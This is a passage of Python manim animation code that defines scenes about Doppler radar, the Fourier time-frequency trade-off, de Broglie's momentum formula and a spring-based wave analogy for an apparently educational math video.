)\n self.remove(*pulses)\n self.play(randy.change, \"pondering\")\n self.play(Transform(\n sum_graph, noisy_graph,\n rate_func = lambda t : wiggle(t, 4),\n run_time = 3\n ))\n self.wait(2)\n\n self.curr_graph = sum_graph\n\n def use_short_pulse(self):\n curr_graph = self.curr_graph\n objects = self.objects\n x_coords = self.object_x_coords\n randy = self.pi_creature\n\n self.frequency_spread_factor = 10\n self.n_pulse_singletons = 4\n self.pulse_frequency = 0.015\n\n graphs = VGroup(*[\n self.get_frequency_pulse_graph(x)\n for x in x_coords\n ])\n sum_graph = self.axes.get_graph(\n lambda t : sum([\n graph.underlying_function(t)\n for graph in graphs\n ]),\n num_graph_points = 1000\n )\n sum_graph.background_image_file = \"blue_yellow_gradient\"\n\n pulses = self.get_pulses()\n\n self.play(FadeOut(curr_graph))\n self.add(*pulses)\n self.wait(0.5)\n self.play(\n ShowCreation(\n sum_graph,\n rate_func=linear,\n run_time = 3.5,\n ),\n randy.change, \"happy\"\n )\n self.wait()\n\n self.curr_graph = sum_graph\n self.first_echo_graph = graphs[0]\n self.first_echo_graph.set_color(YELLOW)\n\n def fourier_transform_of_one_pulse(self):\n frequency_axes = Axes(\n x_min = 0, x_max = 20,\n x_axis_config = {\n \"unit_size\" : 0.5, \n \"tick_frequency\" : 2, \n },\n y_min = -.01, y_max = .01,\n y_axis_config = {\n \"unit_size\" : 110,\n \"tick_frequency\" : 0.006\n }\n )\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.next_to(frequency_axes.x_axis.get_right(), UP)\n frequency_axes.add(frequency_label)\n first_echo_graph = self.first_echo_graph\n\n self.play(\n ApplyMethod(\n VGroup(self.axes, first_echo_graph).to_edge, UP,\n {\"buff\" : SMALL_BUFF},\n rate_func = squish_rate_func(smooth, 0.5, 1)\n ),\n LaggedStartMap(FadeOut, self.objects),\n LaggedStartMap(FadeOut, VGroup(\n self.curr_graph, self.dish, self.pi_creature\n )),\n run_time = 2\n )\n\n #\n frequency_axes.next_to(self.axes, DOWN, LARGE_BUFF, LEFT)\n fourier_graph = get_fourier_graph(\n frequency_axes, first_echo_graph.underlying_function,\n t_min = 0, t_max = 25,\n complex_to_real_func = np.abs,\n )\n fourier_graph.save_state()\n fourier_graph.move_to(first_echo_graph)\n h_vect = 4*RIGHT\n fourier_graph.shift(h_vect)\n fourier_graph.fade(1)\n\n f = 8\n v_line = DashedLine(\n frequency_axes.coords_to_point(f, 0),\n frequency_axes.coords_to_point(f, frequency_axes.y_max),\n )\n v_lines = VGroup(\n v_line.copy().shift(2*LEFT),\n v_line.copy().shift(2*RIGHT),\n )\n rect = Rectangle(stroke_width = 0, fill_color = YELLOW, fill_opacity = 0.25)\n rect.replace(v_lines, stretch = True)\n rect.save_state()\n rect.stretch(0, 0)\n\n self.play(Write(frequency_axes, run_time = 1))\n self.play(\n ApplyFunction(\n lambda m : m.move_to(fourier_graph.saved_state).shift(-h_vect).fade(1),\n first_echo_graph.copy(),\n remover = True,\n ),\n fourier_graph.restore\n )\n self.wait()\n self.play(ShowCreation(v_line))\n self.play(\n ReplacementTransform(VGroup(v_line), v_lines),\n rect.restore\n )\n self.wait()\n self.play(FadeOut(v_lines), FadeOut(rect))\n\n self.frequency_axes = frequency_axes\n self.fourier_graph = fourier_graph\n\n def show_echos_of_moving_objects(self):\n objects = self.objects\n objects.save_state()\n object_velocities = self.object_velocities\n\n movements = self.object_movements = [\n always_shift(\n obj, \n direction = v/get_norm(v),\n rate = get_norm(v)\n )\n for v, obj in zip(object_velocities, objects)\n ]\n pulses = self.get_pulses()\n continual_anims = pulses+movements\n \n self.play(\n FadeOut(self.axes),\n 
FadeOut(self.first_echo_graph),\n LaggedStartMap(FadeIn, objects),\n FadeIn(self.dish)\n )\n self.add(*continual_anims)\n self.wait(4)\n self.play(*[\n UpdateFromAlphaFunc(\n obj, \n lambda m, a : m.set_fill(opacity = 1-a),\n )\n for obj in objects\n ])\n self.remove(*continual_anims)\n self.wait()\n\n def overlapping_frequenies_of_various_objects(self):\n frequency_axes = self.frequency_axes\n fourier_graph = self.fourier_graph\n shifted_graphs = self.get_shifted_frequency_graphs(fourier_graph)\n color = fourier_graph.get_color()\n shifted_graphs.set_color_by_gradient(\n average_color(color, WHITE), \n color,\n average_color(color, BLACK),\n )\n sum_graph = self.get_sum_graph(frequency_axes, shifted_graphs)\n sum_graph.match_style(fourier_graph)\n\n shifted_graphs.save_state()\n\n self.play(ReplacementTransform(\n VGroup(fourier_graph), shifted_graphs,\n lag_ratio = 0.5,\n run_time = 2\n ))\n self.wait()\n self.play(\n shifted_graphs.arrange, DOWN,\n shifted_graphs.move_to, fourier_graph, DOWN,\n )\n self.wait()\n self.play(shifted_graphs.restore),\n self.play(ReplacementTransform(\n shifted_graphs, VGroup(sum_graph),\n ))\n self.wait()\n\n self.curr_fourier_graph = sum_graph\n\n def echos_of_long_pure_signal_in_frequency_space(self):\n curr_fourier_graph = self.curr_fourier_graph\n f_max = self.frequency_axes.y_max\n new_fourier_graph = self.frequency_axes.get_graph(\n lambda x : f_max * np.exp(-100*(x-8)**2),\n num_graph_points = 1000,\n )\n new_fourier_graph.set_color(PINK)\n\n self.play(\n FadeOut(curr_fourier_graph),\n FadeIn(new_fourier_graph),\n )\n self.fourier_graph = new_fourier_graph\n self.overlapping_frequenies_of_various_objects()\n\n def concentrated_fourier_requires_long_time(self):\n objects = self.objects\n objects.restore()\n object_movements = self.object_movements\n self.n_pulse_singletons = 32\n pulses = self.get_pulses()\n randy = self.pi_creature\n\n continual_anims = object_movements+pulses\n self.play(FadeIn(randy))\n self.add(*continual_anims)\n self.play(randy.change, \"angry\", *[\n UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = a))\n for obj in objects\n ])\n self.play(Blink(randy))\n self.wait(2)\n self.play(Blink(randy))\n self.wait()\n self.play(randy.change, \"plain\", *[\n UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = 1-a))\n for obj in objects\n ])\n self.wait()\n\n\n ###\n\n def get_frequency_pulse_graph(self, x, freq = 25, **kwargs):\n graph = IntroduceDopplerRadar.get_frequency_pulse_graph(\n self, x, freq, **kwargs\n )\n return graph\n\n def get_pulse(self, dish, echo_object):\n return RadarPulse(\n dish, echo_object, \n n_pulse_singletons = self.n_pulse_singletons,\n frequency = 0.025,\n speed = 5.0,\n )\n\n def get_pulses(self):\n return [\n self.get_pulse(\n self.dish.copy().shift(0.01*obj.get_center()[0]),\n obj\n )\n for obj in self.objects\n ]\n\n def create_pi_creature(self):\n randy = Randolph()\n randy.scale(0.5).flip()\n randy.to_edge(RIGHT, buff = 1.7).shift(0.5*UP)\n return randy\n\n def get_shifted_frequency_graphs(self, fourier_graph):\n frequency_axes = self.frequency_axes\n def get_func(v):\n return lambda f : fourier_graph.underlying_function(np.clip(\n f-5*v[0], \n frequency_axes.x_min,\n frequency_axes.x_max,\n ))\n def get_graph(func):\n return frequency_axes.get_graph(func)\n shifted_graphs = VGroup(*list(map(\n get_graph, list(map(get_func, self.object_velocities))\n )))\n shifted_graphs.match_style(fourier_graph)\n return shifted_graphs\n\n def get_sum_graph(self, axes, graphs):\n def 
get_func(graph):\n return graph.underlying_function\n funcs = list(map(get_func, graphs))\n return axes.get_graph(\n lambda t : sum([func(t) for func in funcs]),\n )\n\nclass SummarizeFourierTradeoffForDoppler(Scene):\n def construct(self):\n time_axes = Axes(\n x_min = 0, x_max = 12,\n y_min = -0.5, y_max = 1,\n )\n time_axes.center().to_edge(UP, buff = LARGE_BUFF)\n frequency_axes = time_axes.copy()\n frequency_axes.next_to(time_axes, DOWN, buff = 2)\n time_label = OldTexText(\"Time\")\n frequency_label = OldTexText(\"Frequency\")\n for label, axes in (time_label, time_axes), (frequency_label, frequency_axes):\n label.next_to(axes.get_right(), UP, SMALL_BUFF)\n axes.add(label)\n frequency_label.shift_onto_screen()\n title = OldTexText(\"Fourier Trade-off\")\n title.next_to(time_axes, DOWN)\n self.add(title)\n\n\n #Position determines log of scale value for exponentials\n a_mob = VectorizedPoint()\n x_values = [3, 5, 6, 7, 8]\n v_values = [5, 5.5, 5.75, 6.5, 7]\n def get_top_graphs():\n a = np.exp(a_mob.get_center()[0])\n graphs = VGroup(*[\n time_axes.get_graph(lambda t : np.exp(-5*a*(t-x)**2))\n for x in x_values\n ])\n graphs.set_color(WHITE)\n graphs.color_using_background_image(\"blue_yellow_gradient\")\n return graphs\n def get_bottom_graphs():\n a = np.exp(a_mob.get_center()[0])\n graphs = VGroup(*[\n frequency_axes.get_graph(lambda t : np.exp(-(5./a)*(t-v)**2))\n for v in v_values\n ])\n graphs.set_color(RED)\n return graphs\n\n top_graphs = get_top_graphs()\n bottom_graphs = get_bottom_graphs()\n update_top_graphs = Mobject.add_updater(\n top_graphs, \n lambda g : Transform(g, get_top_graphs()).update(1)\n )\n update_bottom_graphs = Mobject.add_updater(\n bottom_graphs, \n lambda g : Transform(g, get_bottom_graphs()).update(1)\n )\n\n self.add(time_axes, frequency_axes)\n self.add(update_top_graphs, update_bottom_graphs)\n\n shift_vect = 2*RIGHT\n for s in 1, -2, 1:\n self.play(a_mob.shift, s*shift_vect, run_time = 3)\n\nclass MentionUncertaintyPrincipleCopy(MentionUncertaintyPrinciple):\n pass\n\nclass IntroduceDeBroglie(Scene):\n CONFIG = {\n \"default_wave_frequency\" : 1,\n \"wave_colors\" : [BLUE_D, YELLOW],\n \"dispersion_factor\" : 1,\n \"amplitude\" : 1,\n }\n def construct(self):\n text_scale_val = 0.8\n\n #Overlay real tower in video editor\n eiffel_tower = Line(3*DOWN, 3*UP, stroke_width = 0)\n picture = ImageMobject(\"de_Broglie\")\n picture.set_height(4)\n picture.to_corner(UP+LEFT)\n name = OldTexText(\"Louis de Broglie\")\n name.next_to(picture, DOWN)\n\n picture.save_state()\n picture.scale(0)\n picture.move_to(eiffel_tower.get_top())\n\n\n broadcasts = [\n Broadcast(\n eiffel_tower.get_top(),\n big_radius = 10,\n n_circles = 10,\n lag_ratio = 0.9,\n run_time = 7,\n rate_func = squish_rate_func(smooth, a, a+0.3),\n color = WHITE,\n )\n for a in np.linspace(0, 0.7, 3)\n ]\n\n self.play(*broadcasts)\n self.play(picture.restore)\n self.play(Write(name))\n self.wait()\n\n #Time line\n time_line = NumberLine(\n x_min = 1900,\n x_max = 1935,\n tick_frequency = 1,\n numbers_with_elongated_ticks = list(range(1900, 1941, 10)),\n color = BLUE_D\n )\n time_line.stretch_to_fit_width(FRAME_WIDTH - picture.get_width() - 2)\n time_line.add_numbers(*time_line.numbers_with_elongated_ticks)\n time_line.next_to(picture, RIGHT, MED_LARGE_BUFF, DOWN)\n\n year_to_words = {\n 1914 : \"World War I begins\",\n 1915 : \"Einstein field equations\",\n 1916 : \"Lewis dot formulas\",\n 1917 : \"Not a lot of physics...because war\",\n 1918 : \"S'more Rutherford badassery\",\n 1919 : \"Eddington 
confirms general relativity predictions\",\n 1920 : \"World is generally stoked on general relativity\",\n 1921 : \"Einstein gets long overdue Nobel prize\",\n 1922 : \"Stern-Gerlach Experiment\",\n 1923 : \"Compton scattering observed\",\n 1924 : \"de Broglie's thesis\"\n }\n arrow = Vector(DOWN, color = WHITE)\n arrow.next_to(time_line.number_to_point(1914), UP)\n words = OldTexText(year_to_words[1914])\n words.scale(text_scale_val)\n date = Integer(1914)\n date.next_to(arrow, UP, LARGE_BUFF)\n\n def get_year(alpha = 0):\n return int(time_line.point_to_number(arrow.get_end()))\n\n def update_words(words):\n text = year_to_words.get(get_year(), \"Hi there\")\n if text not in words.get_tex():\n words.__init__(text)\n words.scale(text_scale_val)\n words.move_to(interpolate(\n arrow.get_top(), date.get_bottom(), 0.5\n ))\n update_words(words)\n self.play(\n FadeIn(time_line),\n GrowArrow(arrow),\n Write(words),\n Write(date),\n run_time = 1\n )\n self.wait()\n self.play(\n arrow.next_to, time_line.number_to_point(1924), UP,\n ChangingDecimal(\n date, get_year,\n position_update_func = lambda m : m.next_to(arrow, UP, LARGE_BUFF)\n ),\n UpdateFromFunc(words, update_words),\n run_time = 3,\n )\n self.wait()\n\n #Transform time_line\n line = time_line\n self.play(\n FadeOut(time_line.numbers),\n VGroup(arrow, words, date).shift, MED_LARGE_BUFF*UP,\n *[\n ApplyFunction(\n lambda m : m.rotate(TAU/4).set_stroke(width = 0),\n mob,\n remover = True\n )\n for mob in time_line.tick_marks\n ]\n )\n\n #Wave function\n particle = VectorizedPoint()\n axes = Axes(x_min = -1, x_max = 10)\n axes.match_width(line)\n axes.shift(line.get_center() - axes.x_axis.get_center())\n im_line = line.copy()\n im_line.set_color(YELLOW)\n wave_update_animation = self.get_wave_update_animation(\n axes, particle, line, im_line\n )\n\n for x in range(3):\n particle.move_to(axes.coords_to_point(-10, 0))\n self.play(\n ApplyMethod(\n particle.move_to, axes.coords_to_point(22, 0),\n rate_func=linear\n ),\n wave_update_animation,\n run_time = 3\n )\n self.wait()\n\n ###\n def get_wave_update_animation(self, axes, particle, re_line = None, im_line = None):\n line = Line(\n axes.x_axis.get_left(),\n axes.x_axis.get_right(),\n )\n if re_line is None:\n re_line = line.copy()\n re_line.set_color(self.wave_colors[0])\n if im_line is None:\n im_line = line.copy()\n im_line.set_color(self.wave_colors[1])\n lines = VGroup(im_line, re_line)\n def update_lines(lines):\n waves = self.get_wave_pair(axes, particle)\n for line, wave in zip(lines, waves):\n wave.match_style(line)\n Transform(line, wave).update(1)\n return UpdateFromFunc(lines, update_lines)\n\n def get_wave(\n self, axes, particle, \n complex_to_real_func = lambda z : z.real,\n freq = None, \n **kwargs):\n freq = freq or self.default_wave_frequency\n k0 = 1./freq\n t0 = axes.x_axis.point_to_number(particle.get_center())\n def func(x):\n dispersion = fdiv(1., self.dispersion_factor)*(np.sqrt(1./(1+t0**2)))\n wave_part = complex_to_real_func(np.exp(\n complex(0, TAU*freq*(x-dispersion))\n ))\n bell_part = np.exp(-dispersion*(x-t0)**2)\n amplitude = self.amplitude\n return amplitude*wave_part*bell_part\n graph = axes.get_graph(func)\n return graph\n\n def get_wave_pair(self, axes, particle, colors = None, **kwargs):\n if colors is None and \"color\" not in kwargs:\n colors = self.wave_colors\n return VGroup(*[\n self.get_wave(\n axes, particle, \n C_to_R, color = color, \n **kwargs\n )\n for C_to_R, color in zip(\n [lambda z : z.imag, lambda z : z.real], \n colors\n )\n ])\n\nclass 
ShowMomentumFormula(IntroduceDeBroglie, TeacherStudentsScene):\n CONFIG = {\n \"default_wave_frequency\" : 2,\n \"dispersion_factor\" : 0.25,\n \"p_color\" : BLUE,\n \"xi_color\" : YELLOW,\n \"amplitude\" : 0.5,\n }\n def construct(self):\n self.introduce_formula()\n self.react_to_claim()\n\n def introduce_formula(self):\n formula = p, eq, h, xi = OldTex(\"p\", \"=\", \"h\", \"\\\\xi\")\n formula.move_to(ORIGIN)\n formula.scale(1.5)\n\n word_shift_val = 1.75\n p_words = OldTexText(\"Momentum\")\n p_words.next_to(p, UP, LARGE_BUFF).shift(word_shift_val*LEFT)\n p_arrow = Arrow(\n p_words.get_bottom(), p.get_corner(UP+LEFT),\n buff = SMALL_BUFF\n )\n added_p_words = OldTexText(\"(Classically $m \\\\times v$)\")\n added_p_words.move_to(p_words, DOWN)\n VGroup(p, p_words, added_p_words, p_arrow).set_color(self.p_color)\n\n xi_words = OldTexText(\"Spatial frequency\")\n added_xi_words = OldTexText(\"(cycles per unit \\\\emph{distance})\")\n xi_words.next_to(xi, UP, LARGE_BUFF).shift(word_shift_val*RIGHT)\n xi_words.align_to(p_words)\n xi_arrow = Arrow(\n xi_words.get_bottom(), xi.get_corner(UP+RIGHT), \n buff = SMALL_BUFF\n )\n added_xi_words.move_to(xi_words, DOWN)\n added_xi_words.align_to(added_p_words, DOWN)\n VGroup(xi, xi_words, added_xi_words, xi_arrow).set_color(self.xi_color)\n\n axes = Axes(\n x_min = 0, x_max = FRAME_WIDTH,\n y_min = -1, y_max = 1,\n )\n axes.center().to_edge(UP, buff = -0.5)\n # axes.next_to(formula, RIGHT)\n particle = VectorizedPoint()\n wave_update_animation = self.get_wave_update_animation(axes, particle)\n wave = wave_update_animation.mobject\n wave[0].set_stroke(width = 0)\n particle.next_to(wave, LEFT, buff = 2)\n wave_propagation = AnimationGroup(\n ApplyMethod(particle.move_to, axes.coords_to_point(30, 0)),\n wave_update_animation,\n run_time = 4,\n rate_func=linear,\n )\n stopped_wave_propagation = AnimationGroup(\n ApplyMethod(particle.move_to, xi_words),\n wave_update_animation,\n run_time = 3,\n rate_func=linear,\n )\n n_v_lines = 10\n v_lines = VGroup(*[\n DashedLine(UP, DOWN)\n for x in range(n_v_lines)\n ])\n v_lines.match_color(xi)\n v_lines.arrange(\n RIGHT,\n buff = float(axes.x_axis.unit_size)/self.default_wave_frequency\n )\n v_lines.move_to(stopped_wave_propagation.sub_anims[0].target_mobject)\n v_lines.align_to(wave)\n v_lines.shift(0.125*RIGHT)\n \n self.add(formula, wave)\n self.play(\n self.teacher.change, \"raise_right_hand\", \n GrowArrow(p_arrow),\n Succession(\n Write, p_words,\n ApplyMethod, p_words.next_to, added_p_words, UP,\n ),\n FadeIn(\n added_p_words,\n rate_func = squish_rate_func(smooth, 0.5, 1),\n run_time = 2,\n ),\n wave_propagation\n )\n self.play(\n Write(xi_words),\n GrowArrow(xi_arrow),\n self.change_students(\"confused\", \"erm\", \"sassy\"),\n stopped_wave_propagation\n )\n self.play(\n FadeIn(added_xi_words),\n xi_words.next_to, added_xi_words, UP,\n )\n self.play(\n LaggedStartMap(ShowCreation, v_lines),\n self.change_students(*[\"pondering\"]*3)\n )\n self.play(LaggedStartMap(FadeOut, v_lines))\n self.wait()\n\n self.formula_labels = VGroup(\n p_words, p_arrow, added_p_words,\n xi_words, xi_arrow, added_xi_words, \n ) \n self.set_variables_as_attrs(wave, wave_propagation, formula)\n\n def react_to_claim(self):\n formula_labels = self.formula_labels\n full_formula = VGroup(self.formula, formula_labels)\n full_formula.save_state()\n wave_propagation = self.wave_propagation\n\n student = self.students[2]\n self.student_says(\n \"Hang on...\",\n bubble_config = {\"height\" : 2, \"width\" : 2, \"direction\" : LEFT},\n 
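# --- Illustrative aside (not part of the original scene code) -----------------
# The formula this scene introduces, p = h*xi, is the de Broglie relation
# written with the spatial frequency xi = 1/lambda (cycles per unit distance),
# so it is equivalent to the more familiar p = h/lambda.  Rough worked numbers
# (assumed values, SI units): an electron moving at 1e6 m/s has
# p = 9.11e-31 kg * 1e6 m/s ~ 9.1e-25 kg*m/s, giving
# lambda = h/p ~ 6.63e-34 / 9.1e-25 ~ 7.3e-10 m, i.e. xi ~ 1.4e9 cycles/meter.
# ------------------------------------------------------------------------------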
target_mode = \"sassy\",\n index = 2,\n added_anims = [self.teacher.change, \"plain\"]\n )\n student.bubble.add(student.bubble.content)\n self.wait()\n kwargs = {\n \"path_arc\" : TAU/4,\n \"lag_ratio\" : 0.5,\n \"lag_ratio\" : 0.7,\n \"run_time\" : 1.5,\n }\n self.play(\n full_formula.scale, 0,\n full_formula.move_to, student.eyes.get_bottom()+SMALL_BUFF*DOWN,\n Animation(student.bubble),\n **kwargs\n )\n self.play(full_formula.restore, Animation(student.bubble), **kwargs)\n wave_propagation.update_config(\n rate_func = lambda a : interpolate(0.35, 1, a)\n )\n self.play(\n wave_propagation, \n RemovePiCreatureBubble(student, target_mode = \"confused\"),\n )\n wave_propagation.update_config(rate_func = lambda t : t)\n self.student_says(\n \"Physics is \\\\\\\\ just weird\",\n bubble_config = {\"height\" : 2.5, \"width\" : 3},\n target_mode = \"shruggie\",\n index = 0,\n added_anims = [ApplyMethod(full_formula.shift, UP)]\n )\n self.wait()\n self.play(\n wave_propagation,\n ApplyMethod(full_formula.shift, DOWN),\n FadeOut(self.students[0].bubble),\n FadeOut(self.students[0].bubble.content),\n self.change_students(*3*[\"pondering\"]),\n self.teacher.change, \"pondering\",\n )\n self.play(wave_propagation)\n\nclass AskPhysicists(PiCreatureScene):\n def construct(self):\n morty, physy1, physy2, physy3 = self.pi_creatures\n formula = OldTex(\"p\", \"=\", \"h\", \"\\\\xi\")\n formula.set_color_by_tex_to_color_map({\n \"p\" : BLUE,\n \"\\\\xi\" : YELLOW,\n })\n formula.scale(1.5)\n\n formula.to_edge(UP)\n formula.save_state()\n formula.shift(DOWN)\n formula.fade(1)\n self.play(formula.restore)\n self.pi_creature_says(\n morty, \"So...why?\",\n target_mode = \"maybe\"\n )\n self.wait(2)\n self.play(\n RemovePiCreatureBubble(morty),\n PiCreatureSays(\n physy2,\n \"Take the Schrödinger equation \\\\\\\\ with $H = \\\\frac{p^2}{2m}+V(x)$\",\n bubble_config = {\"fill_opacity\" : 0.9},\n ),\n )\n self.play(\n PiCreatureSays(\n physy1,\n \"Even classically position and \\\\\\\\ momentum are conjugate\",\n target_mode = \"surprised\",\n bubble_config = {\"fill_opacity\" : 0.9},\n ),\n )\n self.play(\n PiCreatureSays(\n physy3,\n \"Consider special relativity \\\\\\\\ together with $E = hf$\",\n target_mode = \"hooray\",\n bubble_config = {\"fill_opacity\" : 0.9},\n ),\n morty.change, \"guilty\"\n )\n self.wait(2)\n\n\n\n ###\n\n def create_pi_creatures(self):\n scale_factor = 0.85\n morty = Mortimer().flip()\n morty.scale(scale_factor)\n morty.to_corner(DOWN+LEFT)\n\n physies = VGroup(*[\n PiCreature(color = c).flip()\n for c in (GREY, GREY_B, GREY_D)\n ])\n physies.arrange(RIGHT, buff = MED_SMALL_BUFF)\n physies.scale(scale_factor)\n physies.to_corner(DOWN+RIGHT)\n\n self.add(physies)\n return VGroup(morty, *physies)\n\nclass SortOfDopplerEffect(PiCreatureScene):\n CONFIG = {\n \"omega\" : np.pi,\n \"arrow_spacing\" : 0.25,\n }\n def setup(self):\n PiCreatureScene.setup(self)\n rect = self.screen_rect = ScreenRectangle(height = FRAME_HEIGHT)\n rect.set_stroke(width = 0)\n self.camera = MovingCamera(\n rect, **self.camera_config\n )\n\n def construct(self):\n screen_rect = self.screen_rect\n\n #x-coordinate gives time\n t_tracker = VectorizedPoint()\n #x-coordinate gives wave number\n k_tracker = VectorizedPoint(2*RIGHT)\n always_shift(t_tracker, RIGHT, 1)\n def get_wave():\n t = t_tracker.get_center()[0]\n k = k_tracker.get_center()[0]\n omega = self.omega\n color = interpolate_color(\n BLUE, RED, (k-2)/2.0\n )\n func = lambda x : 0.5*np.cos(omega*t - k*x)\n graph = FunctionGraph(\n func,\n x_min = 
-5*FRAME_X_RADIUS,\n x_max = FRAME_X_RADIUS,\n color = color,\n )\n return VGroup(graph, *[\n Arrow(\n x*RIGHT, x*RIGHT + func(x)*UP, \n color = color\n )\n for x in np.arange(\n -4*FRAME_X_RADIUS, FRAME_X_RADIUS, \n self.arrow_spacing\n )\n ])\n return \n wave = get_wave()\n wave_update = Mobject.add_updater(\n wave, lambda w : Transform(w, get_wave()).update(1)\n )\n\n rect = ScreenRectangle(height = 2)\n rect.to_edge(RIGHT)\n always_shift(rect, LEFT, 1)\n rect_movement = rect\n\n randy = self.pi_creature\n randy_look_at = Mobject.add_updater(\n randy, lambda r : r.look_at(rect)\n )\n\n ref_frame1 = OldTexText(\"Reference frame 1\")\n # ref_frame1.next_to(randy, UP, aligned_edge = LEFT)\n ref_frame1.to_edge(UP)\n ref_frame2 = OldTexText(\"Reference frame 2\")\n ref_frame2.next_to(rect, UP)\n # ref_frame2.set_fill(opacity = 0)\n ref_frame2_follow = Mobject.add_updater(\n ref_frame2, lambda m : m.next_to(rect, UP)\n )\n ref_frame_1_continual_anim = ContinualAnimation(ref_frame1)\n\n self.add(\n t_tracker, wave_update, rect_movement, randy_look_at,\n ref_frame2_follow, ref_frame_1_continual_anim\n )\n self.add(ref_frame1)\n self.play(randy.change, \"pondering\")\n self.wait(4)\n start_height = screen_rect.get_height()\n start_center = screen_rect.get_center()\n self.play(\n UpdateFromAlphaFunc(\n screen_rect,\n lambda m, a : m.move_to(\n interpolate(start_center, rect.get_center(), a)\n )\n ),\n k_tracker.shift, 2*RIGHT,\n )\n self.play(\n MaintainPositionRelativeTo(\n screen_rect, rect,\n run_time = 4\n ),\n )\n self.play(\n screen_rect.move_to, rect.get_right()+FRAME_X_RADIUS*LEFT,\n k_tracker.shift, 2*LEFT,\n )\n\n #Frequency words\n temporal_frequency = OldTexText(\"Temporal\", \"frequency\")\n spatial_frequency = OldTexText(\"Spatial\", \"frequency\")\n temporal_frequency.move_to(screen_rect).to_edge(UP)\n spatial_frequency.next_to(temporal_frequency, DOWN)\n cross = Cross(temporal_frequency[0])\n\n time = OldTexText(\"Time\")\n space = OldTexText(\"Space\")\n time.next_to(temporal_frequency, RIGHT, buff = 2)\n space.next_to(time, DOWN)\n space.align_to(spatial_frequency)\n\n self.play(FadeIn(temporal_frequency))\n self.play(ShowCreation(cross))\n self.play(Write(spatial_frequency))\n self.wait()\n self.play(FadeIn(time), FadeIn(space))\n self.play(\n Transform(time, space),\n Transform(space, time),\n lag_ratio = 0.5,\n run_time = 1,\n )\n self.play(FadeOut(time), FadeOut(space))\n self.wait(3)\n\n ###\n\n def create_pi_creature(self):\n return Randolph().scale(0.5).to_corner(DOWN+LEFT)\n\nclass HangingWeightsScene(MovingCameraScene):\n CONFIG = {\n \"frequency\" : 0.5,\n \"ceiling_radius\" : 3*FRAME_X_RADIUS,\n \"n_springs\" : 72,\n \"amplitude\" : 0.6,\n \"spring_radius\" : 0.15,\n }\n def construct(self):\n self.setup_springs()\n self.setup_weights()\n self.introduce()\n self.show_analogy_with_electron()\n self.metaphor_for_something()\n self.moving_reference_frame()\n\n def setup_springs(self):\n ceiling = self.ceiling = Line(LEFT, RIGHT)\n ceiling.scale(self.ceiling_radius)\n ceiling.to_edge(UP, buff = LARGE_BUFF)\n self.add(ceiling)\n\n def get_spring(alpha, height = 2):\n t_max = 6.5\n r = self.spring_radius\n s = (height - r)/(t_max**2)\n spring = ParametricCurve(\n lambda t : op.add(\n r*(np.sin(TAU*t)*RIGHT+np.cos(TAU*t)*UP),\n s*((t_max - t)**2)*DOWN,\n ),\n t_min = 0, t_max = t_max,\n color = WHITE,\n stroke_width = 2,\n )\n spring.alpha = alpha\n spring.move_to(ceiling.point_from_proportion(alpha), UP)\n spring.color_using_background_image(\"grey_gradient\")\n return 
spring\n alphas = np.linspace(0, 1, self.n_springs)\n bezier([0, 1, 0, 1])\n springs = self.springs = VGroup(*list(map(get_spring, alphas)))\n\n k_tracker = self.k_tracker = VectorizedPoint()\n t_tracker = self.t_tracker = VectorizedPoint()\n always_shift(t_tracker, RIGHT, 1)\n self.t_tracker_walk = t_tracker\n equilibrium_height = springs.get_height()\n def update_springs(springs):\n for spring in springs:\n k = k_tracker.get_center()[0]\n t = t_tracker.get_center()[0]\n f = self.frequency\n x = spring.get_top()[0]\n A = self.amplitude\n d_height = A*np.cos(TAU*f*t - k*x)\n new_spring = get_spring(spring.alpha, 2+d_height)\n Transform(spring, new_spring).update(1)\n spring_update_anim = Mobject.add_updater(springs, update_springs)\n self.spring_update_anim = spring_update_anim\n spring_update_anim.update(0)\n\n self.play(\n ShowCreation(ceiling),\n LaggedStartMap(ShowCreation, springs)\n )\n\n def setup_weights(self):\n weights = self.weights = VGroup()\n weight_anims = weight_anims = []\n for spring in self.springs:\n x = spring.get_top()[0]\n mass = np.exp(-0.1*x**2)\n weight = Circle(radius = 0.15)\n weight.start_radius = 0.15\n weight.target_radius = 0.25*mass #For future update\n weight.spring = spring\n weight_anim = Mobject.add_updater(\n weight, lambda w : w.move_to(w.spring.get_bottom())\n )\n weight_anim.update(0)\n weight_anims.append(weight_anim)\n weights.add(weight)\n weights.set_fill(opacity = 1)\n weights.set_color_by_gradient(BLUE_D, BLUE_E, BLUE_D)\n weights.set_stroke(WHITE, 1)\n\n self.play(LaggedStartMap(GrowFromCenter, weights))\n self.add(self.t_tracker_walk)\n self.add(self.spring_update_anim)\n self.add(*weight_anims)\n\n def introduce(self):\n arrow = Arrow(4*LEFT, LEFT)\n arrows = VGroup(arrow, arrow.copy().flip(about_point = ORIGIN))\n arrows.set_color(WHITE)\n\n self.wait(3)\n self.play(*list(map(GrowArrow, arrows)))\n self.play(*[\n UpdateFromAlphaFunc(\n weight, lambda w, a : w.set_width(\n 2*interpolate(w.start_radius, w.target_radius, a)\n ),\n run_time = 2\n )\n for weight in self.weights\n ])\n self.play(FadeOut(arrows))\n self.wait(3)\n\n def show_analogy_with_electron(self):\n words = OldTexText(\n \"Analogous to the energy of a particle \\\\\\\\\",\n \"(in the sense of $E=mc^2$)\"\n )\n words.move_to(DOWN)\n\n self.play(Write(words))\n self.wait(3)\n self.play(FadeOut(words))\n\n def metaphor_for_something(self):\n de_broglie = ImageMobject(\"de_Broglie\")\n de_broglie.set_height(3.5)\n de_broglie.to_corner(DOWN+RIGHT)\n words = OldTexText(\"\"\"\n If a photon's energy is carried as a wave \\\\\\\\\n is this true for any particle?\n \"\"\")\n words.next_to(de_broglie, LEFT)\n\n einstein = ImageMobject(\"Einstein\")\n einstein.match_height(de_broglie)\n einstein.to_corner(DOWN+LEFT)\n\n for picture in de_broglie, einstein:\n picture.backdrop = Rectangle()\n picture.backdrop.replace(picture, stretch = True)\n picture.backdrop.set_fill(BLACK, 1)\n picture.backdrop.set_stroke(BLACK, 0)\n\n self.play(\n Animation(de_broglie.backdrop, remover = True),\n FadeIn(de_broglie)\n )\n self.play(Write(words))\n self.wait(7)\n self.play(\n FadeOut(words),\n Animation(einstein.backdrop, remover = True),\n FadeIn(einstein)\n )\n self.wait(2)\n\n self.de_broglie = de_broglie\n self.einstein = einstein\n\n def moving_reference_frame(self):\n rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)\n rect_movement = always_shift(rect, direction = LEFT, rate = 2)\n camera_frame = 